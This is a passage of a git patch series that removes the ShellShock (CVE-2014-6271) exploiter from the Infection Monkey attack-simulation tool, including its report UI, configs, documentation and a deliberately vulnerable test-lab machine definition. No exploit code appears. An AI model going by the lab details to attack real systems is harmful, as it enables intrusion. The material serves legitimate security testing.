b/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js index 270db721a..a923d01f2 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js @@ -28,7 +28,6 @@ import {drupalIssueOverview, drupalIssueReport} from './security/issues/DrupalIs import {wmiPasswordIssueReport, wmiPthIssueReport} from './security/issues/WmiIssue'; import {sshKeysReport, shhIssueReport, sshIssueOverview} from './security/issues/SshIssue'; import {elasticIssueOverview, elasticIssueReport} from './security/issues/ElasticIssue'; -import {shellShockIssueOverview, shellShockIssueReport} from './security/issues/ShellShockIssue'; import {log4shellIssueOverview, log4shellIssueReport} from './security/issues/Log4ShellIssue'; import { crossSegmentIssueOverview, @@ -125,11 +124,6 @@ class ReportPageComponent extends AuthComponent { [this.issueContentTypes.REPORT]: elasticIssueReport, [this.issueContentTypes.TYPE]: this.issueTypes.DANGER }, - 'ShellShockExploiter': { - [this.issueContentTypes.OVERVIEW]: shellShockIssueOverview, - [this.issueContentTypes.REPORT]: shellShockIssueReport, - [this.issueContentTypes.TYPE]: this.issueTypes.DANGER - }, 'PowerShellExploiter': { [this.issueContentTypes.OVERVIEW]: powershellIssueOverview, [this.issueContentTypes.REPORT]: powershellIssueReport, diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/ShellShockIssue.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/ShellShockIssue.js deleted file mode 100644 index b2496fb21..000000000 --- a/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/ShellShockIssue.js +++ /dev/null @@ -1,30 +0,0 @@ -import React from 'react'; -import CollapsibleWellComponent from '../CollapsibleWell'; - -export function shellShockIssueOverview() { - return (
  • Machines are vulnerable to ‘Shellshock’ (CVE-2014-6271). -
    • ) -} - - -function getShellshockPathListBadges(paths) { - return paths.map(path => {path}); -} - -export function shellShockIssueReport(issue) { - return ( - <> - Update your Bash to a ShellShock-patched version. - - The machine {issue.machine} ({issue.ip_address}) is vulnerable to a ShellShock attack. -
    - The attack was made possible because the HTTP server running on TCP port {issue.port} was vulnerable to a shell injection attack on the - paths: {getShellshockPathListBadges(issue.paths)}. -     - - ); -} From 291755e5c9eb66605f2294d09b096438530bbee6 Mon Sep 17 00:00:00 2001 From: Ilija Lazoroski Date: Wed, 23 Feb 2022 13:29:33 +0100 Subject: [PATCH 3/7] UT: Remove ShellShock from tests config --- monkey/tests/data_for_tests/monkey_configs/flat_config.json | 1 - .../data_for_tests/monkey_configs/monkey_config_standard.json | 1 - monkey/tests/unit_tests/monkey_island/cc/services/test_config.py | 1 - 3 files changed, 3 deletions(-) diff --git a/monkey/tests/data_for_tests/monkey_configs/flat_config.json b/monkey/tests/data_for_tests/monkey_configs/flat_config.json index 4fdc49340..b4ec2c46c 100644 --- a/monkey/tests/data_for_tests/monkey_configs/flat_config.json +++ b/monkey/tests/data_for_tests/monkey_configs/flat_config.json @@ -52,7 +52,6 @@ "SmbExploiter", "WmiExploiter", "SSHExploiter", - "ShellShockExploiter", "ElasticGroovyExploiter", "Struts2Exploiter", "ZerologonExploiter", diff --git a/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json b/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json index 8080b27cf..33944c305 100644 --- a/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json +++ b/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json @@ -5,7 +5,6 @@ "SmbExploiter", "WmiExploiter", "SSHExploiter", - "ShellShockExploiter", "ElasticGroovyExploiter", "Struts2Exploiter", "WebLogicExploiter", diff --git a/monkey/tests/unit_tests/monkey_island/cc/services/test_config.py b/monkey/tests/unit_tests/monkey_island/cc/services/test_config.py index 9bc86bb7f..58e762036 100644 --- a/monkey/tests/unit_tests/monkey_island/cc/services/test_config.py +++ b/monkey/tests/unit_tests/monkey_island/cc/services/test_config.py @@ -187,7 +187,6 @@ def test_format_config_for_agent__exploiters(flat_monkey_config): {"name": "DrupalExploiter", "options": {}}, {"name": "ElasticGroovyExploiter", "options": {}}, {"name": "HadoopExploiter", "options": {}}, - {"name": "ShellShockExploiter", "options": {}}, {"name": "Struts2Exploiter", "options": {}}, {"name": "WebLogicExploiter", "options": {}}, {"name": "ZerologonExploiter", "options": {}}, From fe3b26339835fb4da32d3cf452643cf3aad35434 Mon Sep 17 00:00:00 2001 From: Ilija Lazoroski Date: Wed, 23 Feb 2022 13:30:01 +0100 Subject: [PATCH 4/7] Docs: Remove ShellShock documentation --- docs/content/development/_index.md | 2 +- docs/content/reference/exploiters/shellshock.md | 11 ----------- 2 files changed, 1 insertion(+), 12 deletions(-) delete mode 100644 docs/content/reference/exploiters/shellshock.md diff --git a/docs/content/development/_index.md b/docs/content/development/_index.md index 37a5978e7..85b15adcb 100644 --- a/docs/content/development/_index.md +++ b/docs/content/development/_index.md @@ -26,7 +26,7 @@ You can take a look at [our roadmap](https://github.com/guardicore/monkey/projec The best way to find weak spots in a network is by attacking it. The [*Adding Exploits*](./adding-exploits/) page will help you add exploits. -It's important to note that the Infection Monkey must be absolutely reliable. Otherwise, no one will use it, so avoid memory corruption exploits unless they're rock solid and focus on the logical vulns such as Shellshock. +It's important to note that the Infection Monkey must be absolutely reliable. Otherwise, no one will use it, so avoid memory corruption exploits unless they're rock solid and focus on the logical vulns such as Hadoop. ### Analysis plugins 🔬 diff --git a/docs/content/reference/exploiters/shellshock.md b/docs/content/reference/exploiters/shellshock.md deleted file mode 100644 index 20aee282f..000000000 --- a/docs/content/reference/exploiters/shellshock.md +++ /dev/null @@ -1,11 +0,0 @@ ---- -title: "ShellShock" -date: 2020-07-14T08:41:32+03:00 -draft: false -tags: ["exploit", "linux"] ---- -### Description - -This exploit, CVE-2014-6271, is based on the [logic in NCC group's GitHub](https://github.com/nccgroup/shocker/blob/master/shocker.py). - -> In GNU Bash (through 4.3), processes trailing strings after function definitions in the values of environment variables allow remote attackers to execute arbitrary code via a crafted environment. This is demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients and other situations in which setting the environment occurs across a privilege boundary from Bash execution, AKA "ShellShock." From ddc77e6d6a1e6e33d791df77389f6f370ebb7bf7 Mon Sep 17 00:00:00 2001 From: Ilija Lazoroski Date: Wed, 23 Feb 2022 13:30:46 +0100 Subject: [PATCH 5/7] Zoo: Remove ShellShock Exploiter --- .../blackbox/config_templates/performance.py | 1 - .../blackbox/config_templates/shellshock.py | 17 ---------- .../blackbox/gcp_test_machine_list.py | 1 - envs/monkey_zoo/blackbox/test_blackbox.py | 4 --- .../utils/config_generation_script.py | 2 -- envs/monkey_zoo/docs/fullDocs.md | 33 ------------------- envs/monkey_zoo/terraform/images.tf | 5 --- envs/monkey_zoo/terraform/monkey_zoo.tf | 15 --------- 8 files changed, 78 deletions(-) delete mode 100644 envs/monkey_zoo/blackbox/config_templates/shellshock.py diff --git a/envs/monkey_zoo/blackbox/config_templates/performance.py b/envs/monkey_zoo/blackbox/config_templates/performance.py index eafa82d28..6108664a7 100644 --- a/envs/monkey_zoo/blackbox/config_templates/performance.py +++ b/envs/monkey_zoo/blackbox/config_templates/performance.py @@ -16,7 +16,6 @@ class Performance(ConfigTemplate): "SmbExploiter", "WmiExploiter", "SSHExploiter", - "ShellShockExploiter", "ElasticGroovyExploiter", "Struts2Exploiter", "WebLogicExploiter", diff --git a/envs/monkey_zoo/blackbox/config_templates/shellshock.py b/envs/monkey_zoo/blackbox/config_templates/shellshock.py deleted file mode 100644 index b3620e5b9..000000000 --- a/envs/monkey_zoo/blackbox/config_templates/shellshock.py +++ /dev/null @@ -1,17 +0,0 @@ -from copy import copy - -from envs.monkey_zoo.blackbox.config_templates.base_template import BaseTemplate -from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate - - -class ShellShock(ConfigTemplate): - config_values = copy(BaseTemplate.config_values) - - config_values.update( - { - "basic.exploiters.exploiter_classes": ["ShellShockExploiter"], - "basic_network.scope.subnet_scan_list": ["10.2.2.8"], - "internal.network.tcp_scanner.HTTP_PORTS": [80, 8080], - "internal.network.tcp_scanner.tcp_target_ports": [], - } - ) diff --git a/envs/monkey_zoo/blackbox/gcp_test_machine_list.py b/envs/monkey_zoo/blackbox/gcp_test_machine_list.py index a4dc02447..eadbd6213 100644 --- a/envs/monkey_zoo/blackbox/gcp_test_machine_list.py +++ b/envs/monkey_zoo/blackbox/gcp_test_machine_list.py @@ -17,7 +17,6 @@ GCP_TEST_MACHINE_LIST = { "tunneling-12", "weblogic-18", "weblogic-19", - "shellshock-8", "zerologon-25", "drupal-28", ], diff --git a/envs/monkey_zoo/blackbox/test_blackbox.py b/envs/monkey_zoo/blackbox/test_blackbox.py index e6e64d3cc..2db234ed2 100644 --- a/envs/monkey_zoo/blackbox/test_blackbox.py +++ b/envs/monkey_zoo/blackbox/test_blackbox.py @@ -20,7 +20,6 @@ from envs.monkey_zoo.blackbox.config_templates.powershell import PowerShell from envs.monkey_zoo.blackbox.config_templates.powershell_credentials_reuse import ( PowerShellCredentialsReuse, ) -from envs.monkey_zoo.blackbox.config_templates.shellshock import ShellShock from envs.monkey_zoo.blackbox.config_templates.smb_mimikatz import SmbMimikatz from envs.monkey_zoo.blackbox.config_templates.smb_pth import SmbPth from envs.monkey_zoo.blackbox.config_templates.ssh import Ssh @@ -200,9 +199,6 @@ class TestMonkeyBlackbox: def test_weblogic_exploiter(self, island_client): TestMonkeyBlackbox.run_exploitation_test(island_client, Weblogic, "Weblogic_exploiter") - def test_shellshock_exploiter(self, island_client): - TestMonkeyBlackbox.run_exploitation_test(island_client, ShellShock, "Shellshock_exploiter") - def test_log4j_solr_exploiter(self, island_client): TestMonkeyBlackbox.run_exploitation_test( island_client, Log4jSolr, "Log4Shell_Solr_exploiter" diff --git a/envs/monkey_zoo/blackbox/utils/config_generation_script.py b/envs/monkey_zoo/blackbox/utils/config_generation_script.py index 305d71658..3f787870d 100644 --- a/envs/monkey_zoo/blackbox/utils/config_generation_script.py +++ b/envs/monkey_zoo/blackbox/utils/config_generation_script.py @@ -12,7 +12,6 @@ from envs.monkey_zoo.blackbox.config_templates.log4j_tomcat import Log4jTomcat from envs.monkey_zoo.blackbox.config_templates.mssql import Mssql from envs.monkey_zoo.blackbox.config_templates.performance import Performance from envs.monkey_zoo.blackbox.config_templates.powershell import PowerShell -from envs.monkey_zoo.blackbox.config_templates.shellshock import ShellShock from envs.monkey_zoo.blackbox.config_templates.smb_mimikatz import SmbMimikatz from envs.monkey_zoo.blackbox.config_templates.smb_pth import SmbPth from envs.monkey_zoo.blackbox.config_templates.ssh import Ssh @@ -45,7 +44,6 @@ CONFIG_TEMPLATES = [ Mssql, Performance, PowerShell, - ShellShock, SmbMimikatz, SmbPth, Ssh, diff --git a/envs/monkey_zoo/docs/fullDocs.md b/envs/monkey_zoo/docs/fullDocs.md index 682e82fcf..0381eae34 100644 --- a/envs/monkey_zoo/docs/fullDocs.md +++ b/envs/monkey_zoo/docs/fullDocs.md @@ -11,7 +11,6 @@ This document describes Infection Monkey’s test network, how to deploy and use [Nr. 3 Hadoop](#_Toc526517183)
    [Nr. 4 Elastic](#_Toc526517184)
    [Nr. 5 Elastic](#_Toc526517185)
    -[Nr. 8 Shellshock](#_Toc536021461)
    [Nr. 9 Tunneling M1](#_Toc536021462)
    [Nr. 10 Tunneling M2](#_Toc536021463)
    [Nr. 11 SSH key steal](#_Toc526517190)
    @@ -326,38 +325,6 @@ Update all requirements using deployment script:
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

    Nr. 8 Shellshock

    -

    (10.2.2.8)

    		(Vulnerable)
    OS:Ubuntu 12.04 LTS x64
    Software:Apache2, bash 4.2.
    Default server’s port:80
    Scan results:Machine exploited using Shellshock exploiter
    Notes:Vulnerable app is under /cgi-bin/test.cgi
    - diff --git a/envs/monkey_zoo/terraform/images.tf b/envs/monkey_zoo/terraform/images.tf index a3e2bcb73..23632514a 100644 --- a/envs/monkey_zoo/terraform/images.tf +++ b/envs/monkey_zoo/terraform/images.tf @@ -15,11 +15,6 @@ data "google_compute_image" "elastic-5" { name = "elastic-5" project = local.monkeyzoo_project } - -data "google_compute_image" "shellshock-8" { - name = "shellshock-8" - project = local.monkeyzoo_project -} data "google_compute_image" "tunneling-9" { name = "tunneling-9" project = local.monkeyzoo_project diff --git a/envs/monkey_zoo/terraform/monkey_zoo.tf b/envs/monkey_zoo/terraform/monkey_zoo.tf index a53c59007..eff0a44e5 100644 --- a/envs/monkey_zoo/terraform/monkey_zoo.tf +++ b/envs/monkey_zoo/terraform/monkey_zoo.tf @@ -106,21 +106,6 @@ resource "google_compute_instance_from_template" "elastic-5" { } } -resource "google_compute_instance_from_template" "shellshock-8" { - name = "${local.resource_prefix}shellshock-8" - source_instance_template = local.default_ubuntu - boot_disk{ - initialize_params { - image = data.google_compute_image.shellshock-8.self_link - } - auto_delete = true - } - network_interface { - subnetwork="${local.resource_prefix}monkeyzoo-main" - network_ip="10.2.2.8" - } -} - resource "google_compute_instance_from_template" "tunneling-9" { name = "${local.resource_prefix}tunneling-9" source_instance_template = local.default_ubuntu From d8e203dd5052408c0b427ce372bc533f735ef9a3 Mon Sep 17 00:00:00 2001 From: Ilija Lazoroski Date: Wed, 23 Feb 2022 13:39:36 +0100 Subject: [PATCH 6/7] Project: Change readme and remove shellshock from vulture --- README.md | 2 +- vulture_allowlist.py | 1 - 2 files changed, 1 insertion(+), 2 deletions(-) diff --git a/README.md b/README.md index 6100219df..7342c49a7 100644 --- a/README.md +++ b/README.md @@ -46,7 +46,7 @@ The Infection Monkey uses the following techniques and exploits to propagate to * SSH * SMB * WMI - * Shellshock + * Log4Shell * Elastic Search (CVE-2015-1427) * Weblogic server * and more, see our [Documentation hub](https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/) for more information about our RCE exploiters. diff --git a/vulture_allowlist.py b/vulture_allowlist.py index dde79f032..655590dcf 100644 --- a/vulture_allowlist.py +++ b/vulture_allowlist.py @@ -57,7 +57,6 @@ password_restored # unused variable (monkey/monkey_island/cc/services/reporting SSH # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:30) SAMBACRY # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:31) ELASTIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:32) -SHELLSHOCK # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:36) STRUTS2 # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:39) WEBLOGIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40) HADOOP # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:43) From 55c3236d8e900844755100ffbf058efda3ba2ccd Mon Sep 17 00:00:00 2001 From: Mike Salvatore Date: Wed, 23 Feb 2022 10:19:27 -0500 Subject: [PATCH 7/7] Changelog: Remove ShellShock exploiter --- CHANGELOG.md | 1 + 1 file changed, 1 insertion(+) diff --git a/CHANGELOG.md b/CHANGELOG.md index f1796d1e3..97017beb5 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -45,6 +45,7 @@ Changelog](https://keepachangelog.com/en/1.0.0/). - MS08-067 (Conficker) exploiter. #1677 - Agent bootloader. #1676 - Zero Trust integration with ScoutSuite. #1669 +- ShellShock exploiter. #1733 ### Fixed - A bug in network map page that caused delay of telemetry log loading. #1545